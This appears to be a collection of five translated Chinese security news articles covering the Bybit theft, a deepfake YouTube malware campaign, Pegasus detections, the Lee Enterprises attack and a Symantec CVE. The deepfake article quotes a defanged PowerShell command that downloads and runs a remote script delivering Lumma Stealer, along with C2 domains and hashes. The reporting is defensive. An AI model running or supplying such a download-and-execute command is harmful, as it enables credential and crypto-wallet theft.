HackerNews 编译，转载请注明出处： 加密货币交易所 Bybit 周五披露，一起“复杂”的攻击导致其一个以太坊冷（离线）钱包中的超过 14.6 亿美元的加密货币被盗，这成为有史以来最大的单次加密货币盗窃案。 Bybit 在 X 上的一篇帖子中表示：“此次事件发生在我们的 ETH 多签冷钱包向热钱包执行转账时。不幸的是，这笔交易通过一种复杂的攻击被操纵，该攻击掩盖了签名界面，显示正确的地址的同时修改了底层的智能合约逻辑。” “结果，攻击者能够控制受影响的 ETH 冷钱包，并将其资产转移到一个未知地址。” Bybit 首席执行官 Ben Zhou 在社交媒体平台上发布的另一份声明中强调，所有其他冷钱包都是安全的。公司进一步表示已向有关部门报告了此案。 虽然 Bybit 尚未正式确认，但 Elliptic 和 Arkham Intelligence 确认这起数字盗窃案是由臭名昭著的 Lazarus Group 所为。这起事件成为迄今为止报告的最大加密货币盗窃案，超过了 Ronin Network（6.24 亿美元）、Poly Network（6.11 亿美元）和 BNB Bridge（5.86 亿美元）的盗窃案。 独立研究员 ZachXBT 表示，他们“将 Bybit 黑客攻击与 Phemex 黑客攻击联系起来”，后者发生在上个月末。 这个总部位于朝鲜的威胁行为体是最多产的黑客组织之一，策划了数十起加密货币盗窃案，为受制裁的国家生成非法收入。去年，谷歌将朝鲜描述为“可以说是世界上领先的网络犯罪企业”。 2024 年，据估计该组织在 47 起加密货币攻击中窃取了 13.4 亿美元，占该时期所有非法加密货币的 61%，区块链情报公司 Chainalysis 表示。 谷歌旗下的 Mandiant 上个月表示：“由于加密货币劫案的高收益、归因于恶意行为者的挑战以及许多组织对加密货币和 Web3 技术的初步熟悉，加密货币劫案正在增加。”   消息来源：The Hacker News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本，目标锁定加密货币爱好者和金融交易者，标志着社会工程战术的危险演变。 据网络安全研究公司 Gen Digital 发现，这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷，操纵受害者主动破坏自己的系统。 这种攻击在 2024 年第三季度激增了 614%，结合了尖端的深度伪造技术和精心设计的心理诱饵，引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。 安全分析师指出，该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。 视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物，利用先进的面部动画、语音合成和身体动作复制技术制作而成。 尽管该频道看起来合法，包括从 TradingView 重新发布的内 容，但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”，声称该模式可以以 97% 的准确率预测加密货币市场趋势。 攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框（Win+R）并执行一个从 paste-sharing 网站（如 Pastefy[.]com 或 Obin[.]net）获取恶意脚本的 PowerShell 命令。 研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码： iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’) 该脚本连接到一个命令与控制（C&C）服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。 前者窃取加密货币钱包和浏览器凭据，而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值，包括： a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意 PowerShell 脚本） 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer 变种） 至关重要的是，深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender，而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。 攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围，针对观看合法金融内容的用户。 与传统的网络钓鱼不同，受害者主动参与了他们的系统被破坏的过程，认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化，通过多个渠道验证数字指令已成为一种不可或缺的安全实践。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 移动设备安全公司 iVerify 的新发现表明，强大的零点击间谍软件的使用范围比之前理解的更为广泛，不仅影响民间社会成员，还波及企业高管。 iVerify 在周三宣布，仅在 12 月份，就在其测试的 18,000 台唯一设备中检测到了 11 台感染了 “飞马” 间谍软件。 iVerify 此前在 12 月份表示，自 5 月份首次提供诊断扫描服务以来，在提交测试的 3,000 部手机中发现了 7 部感染了 “飞马” 间谍软件。关于这些检测的新闻报道导致 iVerify 的威胁狩猎应用程序的使用范围更广，涵盖了更主流的用户群体。 该公司描述的最新受害者均在私营行业工作，包括房地产、物流和金融领域，只有一位是欧洲政府官员。愿意透露其所在地的受害者来自瑞士、波兰、巴林、西班牙、捷克共和国和亚美尼亚。 “飞马” 间谍软件由以色列公司 NSO Group 制造，多年来一直面临质疑，因为尽管该公司声称其产品仅出售给针对犯罪分子和恐怖分子的政府，但该间谍软件仍频繁出现在民间社会的手机中。零点击间谍软件无需与设备所有者直接交互即可安装。 iVerify 应用程序下载费用为 1 美元，用户可以每月扫描一次手机，检测高级商业间谍软件。设备所有者只需按照几个简单的步骤创建一个诊断文件，iVerify 将在几小时内完成评估。 该公司的扫描通过查找恶意软件签名并部分依赖机器学习来发现间谍软件感染的迹象和设备中的异常情况。 据 iVerify 称，新确认的检测发现了 2021-2023 年间的已知 “飞马” 变种，许多受害者被多种变种攻击。iVerify 表示，有些受害者被监视了数年。 iVerify 表示，仍在研究多个额外案例，这些案例中的法医痕迹表明可能存在潜在攻击。 企业高管成为 “飞马” 间谍软件的目标，为这场间谍软件危机增添了新的维度。这些高管可以接触到秘密的公司计划、财务数据，并且经常与其他在幕后进行敏感工作的有影响力的私营部门领导人交流，包括那些可能影响金融市场的交易。 迄今为止，大多数已知的 “飞马” 感染案例涉及记者、人权活动家、政治家和其他民间社会成员。 “从安全角度来看，世界对这种情况完全没有准备，” iVerify 联合创始人、前国家安全局分析师 Rocky Cole 在采访中表示。“这种情况比人们想象的要普遍得多。” Cole 表示，在最近的扫描中，只有一半被发现感染了 “飞马” 间谍软件的手机用户收到了苹果公司的威胁通知。 Cole 表示，公司只报告了 “真正阳性” 的 “飞马” 检测结果，并未包括那些无法通过独立外展验证身份的用户。 iVerify 还测试了其他类型的间谍软件，包括 Paragon（Graphite）、QuaDream（Reign）和 Intellexa（Predator）的产品，但这项新研究仅包括感染了 “飞马” 间谍软件的手机检测结果。   消息来源：The Record；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国媒体公司Lee企业（Lee Enterprises）公布了最近一次网络攻击的更多细节，透露攻击者加密并窃取了文件。 Lee企业在 25 个州拥有 350 家周报和专业出版物。据新闻自由追踪器报道，至少有 75 家报纸受到了网络攻击的影响。 Lee企业首次向美国证券交易委员会（SEC）报告网络攻击时，表示由于 “网络安全事件”，公司在 2 月 3 日遭遇了技术故障。其许多出版物的运营受到了影响，包括印刷报纸、订阅账户和内部服务。 在周二向 SEC 提交的更新中，Lee企业没有明确表示遭受了勒索软件攻击，但根据目前的调查，威胁行为者侵入了其网络，加密了关键应用程序并窃取了某些文件，这符合典型的勒索软件攻击特征。 Lee企业正在进行法医分析，以确定是否有个人或敏感信息因黑客攻击而泄露。 “此次事件影响了公司的运营，包括产品分发、账单、收款和供应商付款。我们产品组合中的印刷出版物分发出现了延迟，在线运营也部分受限，” Lee企业向 SEC 表示。 该公司补充说：“截至 2025 年 2 月 12 日，所有核心产品已恢复正常分发节奏，但周报和附属产品尚未恢复。这些产品占公司总运营收入的 5%。公司预计将在未来几周内逐步恢复这些业务。” 这家媒体巨头预计此次事件将产生重大影响，但财务影响的全部范围尚未确定。 SecurityWeek 尚未发现任何已知的勒索软件组织声称对此次攻击负责。 目前尚不清楚Lee企业是否支付了赎金或正在考虑这一选项，但公司指出，它确实拥有一份 “全面的网络安全保险政策，涵盖与事件响应、法医调查、业务中断和监管罚款相关的费用，但需遵守保单限额和免赔额”。   消息来源：Security Week；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 赛门铁克（Symantec），博通（Broadcom）的一个部门，已解决了其诊断工具（SymDiag）中的一个关键安全漏洞（CVE-2025-0893），该漏洞可能允许攻击者在受影响的系统上提升权限。 该漏洞影响 SymDiag 3.0.79 之前的版本，由于其可能通过本地利用威胁机密性、完整性和可用性，因此获得了 CVSSv3 7.8（高严重性）的评分。 该漏洞源于 SymDiag 的权限管理不当，这是一个用于排查赛门铁克产品（如 Web 安全服务（WSS）代理）问题的工具。 具有低权限访问的攻击者可以利用此漏洞以提升的权限执行任意代码，从而有效绕过安全控制。 该问题特别影响 SymDiag 与 WSS 代理交互的系统，WSS 代理是赛门铁克安全 Web 网关（SWG）解决方案的一个组件，用于流量重定向和云安全强制执行。 根据博通的咨询，该漏洞存在于 SymDiag 在收集诊断数据期间处理进程提升的方式中。 成功的利用可能使未经授权访问敏感系统资源、修改安全配置或中断终端保护服务。 尽管尚未记录任何公开利用，但 SymDiag 的诊断功能与 WSS 代理的网络级权限相结合，如果未修补，将创建高风险场景。 缓解和补丁部署 赛门铁克已在 SymDiag 3.0.79 中解决了此问题，该版本已通过赛门铁克终端保护管理器（SEPM）自动部署到所有受影响的终端。 更新移除了旧的易受攻击版本的 SymDiag，确保使用托管部署的企业客户无需手动干预。 对于独立安装，建议用户通过工具的界面或命令行实用程序验证其 SymDiag 版本。 虽然补丁缓解了 immediate risk，但博通强调了更广泛的安全强化措施： 最小权限原则：限制管理访问仅限授权人员，并对终端管理工具实施基于角色的访问控制（RBAC）。 网络分段：隔离管理接口并限制远程访问仅限受信任的 IP 范围。 深度防御：部署入侵检测系统（IDS）和终端检测与响应（EDR）工具，以监控异常活动，特别是在使用旧版 WSS 代理配置的环境中。 CVE-2025-0893 对使用 SymDiag 与赛门铁克 WSS 代理结合的组织构成了针对性但严重的风险。 迅速的补丁部署展示了博通对其零信任路线图的承诺，尽管管理员应审计旧系统以查找潜在的残留漏洞。 随着云安全工具越来越多地处理解密流量和特权操作，供应商必须在诊断功能与严格的访问控制之间取得平衡，以防止在违规情况下发生横向移动。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文